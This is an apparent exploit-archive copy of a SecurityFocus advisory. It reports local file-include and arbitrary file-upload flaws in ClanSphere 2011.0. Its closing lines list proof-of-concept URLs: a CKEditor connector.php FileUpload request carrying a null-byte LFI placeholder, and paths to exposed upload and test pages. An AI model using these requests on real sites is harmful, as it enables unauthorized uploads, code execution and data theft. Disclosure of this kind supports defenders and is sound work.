13 lines
No EOL
889 B
Text
13 lines
No EOL
889 B
Text
source: https://www.securityfocus.com/bid/47636/info
|
|
|
|
ClanSphere is prone to a local file-include vulnerability and multiple arbitrary-file-upload vulnerabilities.
|
|
|
|
An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.
|
|
|
|
ClanSphere 2011.0 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/[path]/mods/ckeditor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=[LFI]%00
|
|
http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/test.html
|
|
http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/uploadtest.html
|
|
http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/browser.html
|
|
http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/frmupload.html |